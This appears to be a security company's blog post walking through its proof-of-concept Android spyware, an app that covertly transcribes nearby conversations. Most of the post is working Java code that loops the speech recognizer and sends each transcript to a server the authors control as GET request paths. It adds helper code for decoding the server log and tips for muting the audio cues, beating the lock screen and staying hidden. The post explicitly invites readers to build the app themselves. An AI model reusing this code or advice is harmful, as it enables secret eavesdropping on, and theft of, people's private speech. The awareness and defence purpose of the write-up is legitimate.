How we made the listening-in Android app

You may have seen us on the BBC recently, showing how a mobile device can be used to snoop on you. I created an Android app to surreptitiously listen in on conversations near the device and send them to an offsite server as plain text.

We’ve had a few questions asking how we put the app together, so here’s an explanation so that you can do it yourself.

CAVEAT: We were under significant time pressure to get the app ready for a filming date, so it’s very hacked together. It’s no perfect app!

How it works

I went for a quick mock up – to prove that it was possible to actually write an app that would listen-in. I took some things for granted:

The user would accept any requested permissions, because as shown by Facebook, they do if they think the content is worth it.
The app can work in the foreground. It is possible to get this to work in the background but I was running out of time. This isn’t too much of a stretch; lots of people have apps that run constantly in the foreground (e.g. a recipe app in the kitchen).

The basic flow is simple: the app initialises and displays a screen, then creates an instance of Android’s SpeechRecognizer class and, whenever it gets a result, sends it off site.

Doesn’t sound too difficult does it?

So, I loaded up Android Studio and created the app: ptp.unacceptablebehaviour. Although most of the tests just had a simple text bar, for the final version we had one of our guys whip up a killer graphic:

So, once it starts, it displays the image. Then it sets up a Google SpeechRecognizer object:

speech = SpeechRecognizer.createSpeechRecognizer(this);
speech.setRecognitionListener(this);
restartSR();

// Starts a new recognition session; called again after each result.
private void restartSR() {
    recognizerIntent = new Intent(RecognizerIntent.ACTION_RECOGNIZE_SPEECH);
    recognizerIntent.putExtra(RecognizerIntent.EXTRA_LANGUAGE_PREFERENCE, "en");
    recognizerIntent.putExtra(RecognizerIntent.EXTRA_CALLING_PACKAGE,
            this.getPackageName());
    recognizerIntent.putExtra(RecognizerIntent.EXTRA_LANGUAGE_MODEL,
            RecognizerIntent.LANGUAGE_MODEL_WEB_SEARCH);
    recognizerIntent.putExtra(RecognizerIntent.EXTRA_MAX_RESULTS, 3);
    speech.startListening(recognizerIntent);
}

I put the code that starts recognition in a separate method so I could easily restart the speech recognition when it finished.
The Google speech recognition class works by setting up a listener which will do all the hard work and then call back at various points in its life. We hook into these callbacks, mainly for logging purposes. The essential calls are:

onReadyForSpeech – the listener is set up and is actively checking the microphone
onBeginningOfSpeech – the listener has heard something that sounds like speech and is recording it
onEndOfSpeech – the listener has noticed that the speech has stopped
onResults – called when the speech has been converted to text
onError – something went wrong

There’s also an onPartialResults callback, which is designed for when the speech goes on for too long without a break. In testing this never got called.

In this case all I was really interested in was onResults, where we have the text string of what the phone has heard. It’s here that we do our callback.

Again I took a lazy route for this. The quickest, easiest and dirtiest way of transferring a string to somewhere is to make it into a web call and record it in the web log of a site that we control. It doesn’t matter whether that call is to a valid URL, as long as it hits the web log.

As HTTP calls are common in Android apps, I just used the standard Java HttpURLConnection class:

public void onResults(Bundle results) {
    Log.i(LOG_TAG, "onResults");
    // Each entry is one candidate transcription of the same utterance.
    ArrayList<String> matches = results
            .getStringArrayList(SpeechRecognizer.RESULTS_RECOGNITION);
    for (String result : matches) {
        try {
            // Smuggle the text out as the path of a GET request.
            String desturl = "http://xxxxxxxx.com/recorded/" + URLEncoder.encode(result, "UTF-8");
            Log.i(LOG_TAG, "Sending to " + desturl);
            URL url = new URL(desturl);
            HttpURLConnection connect = (HttpURLConnection) url.openConnection();
            connect.connect();
            InputStream in = new BufferedInputStream(connect.getInputStream());
            in.read();
            connect.disconnect();
        }
        catch (MalformedURLException e) {
            Log.i(LOG_TAG, "Malformed URL");
        }
        catch (IOException e) {
            Log.i(LOG_TAG, "IO Exception");
        }
        catch (Exception e) {
            Log.i(LOG_TAG, "Exception Type " + e.getMessage());
        }
    }
    // Start listening again for the next utterance.
    restartSR();
}

So, if the speech recogniser picks up the phrase “unacceptable behaviour” it will convert this to:

http://xxxxxxxx.com/recorded/unacceptable+behaviour

The domain name has been redacted, not because I want to keep it secret, but because I was running out of domain names to use and this one had a swearword in it!
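
The encoding step can be tried on its own in plain Java, away from Android. This is only a sketch: the class name PhraseUrl and the build helper are made up for illustration, and the base URL is the redacted placeholder from above. It shows that URLEncoder applies form-style encoding, which is why spaces turn into + rather than %20.

```java
import java.io.UnsupportedEncodingException;
import java.net.URLEncoder;
import java.nio.charset.StandardCharsets;

// Hypothetical helper, not part of the original app.
final class PhraseUrl {

    // Appends the form-encoded phrase to the base URL, as onResults does.
    static String build(String baseUrl, String phrase) {
        try {
            return baseUrl + URLEncoder.encode(phrase, StandardCharsets.UTF_8.name());
        } catch (UnsupportedEncodingException e) {
            // Every JVM is required to support UTF-8, so this should not happen.
            throw new IllegalStateException("UTF-8 unavailable", e);
        }
    }

    public static void main(String[] args) {
        String base = "http://xxxxxxxx.com/recorded/"; // redacted placeholder
        // prints http://xxxxxxxx.com/recorded/unacceptable+behaviour
        System.out.println(build(base, "unacceptable behaviour"));
        // prints http://xxxxxxxx.com/recorded/fish+%26+chips%3F
        System.out.println(build(base, "fish & chips?"));
    }
}
```

Characters that would otherwise break the URL, such as & and ?, are percent-encoded, so whatever the recogniser returns ends up as a single path segment.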

Here’s the device’s logfile:

03-22 12:11:28.634 21033-21033/ptp.unacceptablebehaviour I/MainActivity: onReadyForSpeech
03-22 12:11:29.930 21033-21033/ptp.unacceptablebehaviour I/MainActivity: onBeginningOfSpeech
03-22 12:11:33.636 21033-21033/ptp.unacceptablebehaviour I/MainActivity: onEndOfSpeech
03-22 12:11:33.636 21033-21033/ptp.unacceptablebehaviour I/MainActivity: Here
03-22 12:11:34.711 21033-21033/ptp.unacceptablebehaviour I/MainActivity: onResults
03-22 12:11:34.719 21033-21033/ptp.unacceptablebehaviour I/MainActivity: Sending to http://xxxxxxxx.com/recorded/unacceptable+behaviour
03-22 12:11:34.837 21033-21033/ptp.unacceptablebehaviour I/MainActivity: IO Exception
03-22 12:11:34.837 21033-21033/ptp.unacceptablebehaviour I/MainActivity: Sending to http://xxxxxxxx.com/recorded/an+acceptable+behaviour
03-22 12:11:34.885 21033-21033/ptp.unacceptablebehaviour I/MainActivity: IO Exception
03-22 12:11:34.885 21033-21033/ptp.unacceptablebehaviour I/MainActivity: Sending to http://xxxxxxxx.com/recorded/unacceptable+behaviours
03-22 12:11:34.937 21033-21033/ptp.unacceptablebehaviour I/MainActivity: IO Exception
03-22 12:11:34.937 21033-21033/ptp.unacceptablebehaviour I/MainActivity: Sending to http://xxxxxxxx.com/recorded/and+acceptable+behaviour
03-22 12:11:34.988 21033-21033/ptp.unacceptablebehaviour I/MainActivity: IO Exception
03-22 12:11:34.989 21033-21033/ptp.unacceptablebehaviour I/MainActivity: Sending to http://xxxxxxxx.com/recorded/acceptable+behaviour
03-22 12:11:35.029 21033-21033/ptp.unacceptablebehaviour I/MainActivity: IO Exception
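
The IO Exception lines are what you would expect if the server answers 404 for these made-up paths: HttpURLConnection.getInputStream() throws a FileNotFoundException (a kind of IOException) on a 404, but by then the request has already reached the server. That the real server returned 404 is my assumption here. The sketch below reproduces the effect locally with the JDK's built-in com.sun.net.httpserver; the class DeadDropDemo and everything in it is hypothetical and runs on a desktop JVM, not on Android.

```java
import com.sun.net.httpserver.HttpServer;
import java.io.IOException;
import java.io.InputStream;
import java.io.UncheckedIOException;
import java.net.HttpURLConnection;
import java.net.InetSocketAddress;
import java.net.Proxy;
import java.net.URL;
import java.util.List;
import java.util.concurrent.CopyOnWriteArrayList;

// Hypothetical demo class; nothing here comes from the original app.
final class DeadDropDemo {

    // Stands in for the web server's access log.
    static final List<String> seenPaths = new CopyOnWriteArrayList<>();

    // Starts a throwaway local server that records each raw request path
    // and then answers 404 with no body.
    static HttpServer startServer() {
        try {
            HttpServer server = HttpServer.create(new InetSocketAddress("127.0.0.1", 0), 0);
            server.createContext("/", exchange -> {
                seenPaths.add(exchange.getRequestURI().getRawPath());
                exchange.sendResponseHeaders(404, -1);
                exchange.close();
            });
            server.start();
            return server;
        } catch (IOException e) {
            throw new UncheckedIOException(e);
        }
    }

    // Mirrors the client side of onResults. Returns true if reading the
    // response threw an IOException.
    static boolean sendAndCheckForIoException(String desturl) {
        HttpURLConnection connect = null;
        try {
            connect = (HttpURLConnection) new URL(desturl).openConnection(Proxy.NO_PROXY);
            try (InputStream in = connect.getInputStream()) {
                in.read();
            }
            return false;
        } catch (IOException e) {
            return true;
        } finally {
            if (connect != null) {
                connect.disconnect();
            }
        }
    }

    public static void main(String[] args) {
        HttpServer server = startServer();
        try {
            int port = server.getAddress().getPort();
            boolean failed = sendAndCheckForIoException(
                    "http://127.0.0.1:" + port + "/recorded/unacceptable+behaviour");
            System.out.println("client saw IOException: " + failed);
            System.out.println("server recorded: " + seenPaths);
        } finally {
            server.stop(0);
        }
    }
}
```

The client reports a failure while the server has still recorded the path, which is all the app needs.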

And then we can see the log on our webserver:

Yeah, it’s clunky, but it works!
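
Getting the phrases back out of the web log is just the encoding step in reverse. Here is a minimal sketch, assuming an access log in the usual Apache/nginx style where the request line appears as "GET /path HTTP/1.1". The class WebLogDecoder is hypothetical, and the sample log line in main is invented for illustration, not copied from our server.

```java
import java.io.UnsupportedEncodingException;
import java.net.URLDecoder;
import java.nio.charset.StandardCharsets;
import java.util.Optional;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

// Hypothetical helper, not part of the original setup.
final class WebLogDecoder {

    // The /recorded/ prefix is the one the app uses; the rest of the
    // line format is an assumption.
    private static final Pattern RECORDED = Pattern.compile("GET /recorded/(\\S+)");

    // Returns the spoken phrase hidden in a log line, if there is one.
    static Optional<String> phraseFrom(String logLine) {
        Matcher m = RECORDED.matcher(logLine);
        if (!m.find()) {
            return Optional.empty();
        }
        try {
            return Optional.of(URLDecoder.decode(m.group(1), StandardCharsets.UTF_8.name()));
        } catch (UnsupportedEncodingException e) {
            throw new IllegalStateException("UTF-8 unavailable", e);
        } catch (IllegalArgumentException e) {
            // Malformed percent-escape: treat the line as not ours.
            return Optional.empty();
        }
    }

    public static void main(String[] args) {
        // Invented sample line using a documentation-only IP address.
        String line = "192.0.2.1 - - [01/Jan/2000:00:00:00 +0000] "
                + "\"GET /recorded/unacceptable+behaviour HTTP/1.1\" 404 162";
        // prints unacceptable behaviour
        System.out.println(phraseFrom(line).orElse("(no phrase)"));
    }
}
```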

Some Problems

It’s not perfect and we found some problems whilst writing it which are explained below.

Permissions

The app needed quite a few permissions and these may be enough to raise some warning flags. The permissions I gave it in the end were:

MODIFY_AUDIO_SETTINGS – to allow the app to alter the volume – this is explained below
INTERNET – For SpeechRecognizer and to log the results
ACCESS_NETWORK_STATE – For SpeechRecognizer
RECORD_AUDIO – For SpeechRecognizer

In a later version I also stopped the screen going to sleep to make it easier to run in the demo.

These actually caused me more problems than first thought – my test Android device is a Nexus 5 running Android 6 (Marshmallow). Marshmallow was the first version of Android to officially allow the user to over-ride app permissions, which caused me to repeatedly wonder why I was getting a “permission denied” message when it was just that I had refused the permission!

Audio Cues

Google’s SpeechRecognizer uses two audio cues, one on onReadyForSpeech and the other on onEndOfSpeech. These cues cannot be overridden or changed. All I could do was mute the media audio stream that they are played on:

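// Mute the stream the cues are played on. ADJUST_MUTE is a direction for
// adjustStreamVolume() (API 23+), not a volume index for setStreamVolume().
AudioManager am = (AudioManager) getBaseContext().getSystemService(Context.AUDIO_SERVICE);
am.adjustStreamVolume(AudioManager.STREAM_MUSIC, AudioManager.ADJUST_MUTE, 0);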

On Marshmallow and Lollipop this is the Music stream; on earlier versions of Android it is the System stream.
Obviously, as I’m messing with the system settings, this ruins the stealthiness of it. Using an alternative speech-to-text service could make this easier.

Battery Life

There will be an impact on battery life, although in testing the largest drain was the screen (as I was keeping the screen on full time) so this needs to be assessed with a proper background service.

Lock Screen

The lock screen would stop it listening whilst the phone is locked – it is possible to get around this using Android’s Daydream (screensaver) feature. This would require extra permissions and testing.

Serving Adverts

The last bit of the test was to see whether we could create custom adverts based on what it heard. So I plugged in Google’s AdView, and there I found the problem. AdView allows keywords to be added to ad requests but it doesn’t actually use them to serve adverts.

See, I even had the code to do it:

AdView adview = (AdView) findViewById(R.id.adView);
AdRequest adrequest = new AdRequest.Builder().addKeyword(matches.get(0)).build();
adview.loadAd(adrequest);

Back to the drawing board on this, or to use a different advertising provider.

Conclusions

It’s easy enough to write an app that can listen in to you and convert what you say to text, even with just half a day of gluing random bits of code together.

There are some hurdles that need to be worked through to make this totally stealthy and to get the ad networks to respond.
It looks like Google’s taken the right steps with its SpeechRecognizer and AdView APIs.

Finally, the best defence is to allow user control over app permissions, something that should have been in Android a long time ago. The facility was in the OS as far back as Jelly Bean, but was removed from KitKat and Lollipop. Google really dropped the ball with this and we should question why it took so long for such an effective defence to be implemented.
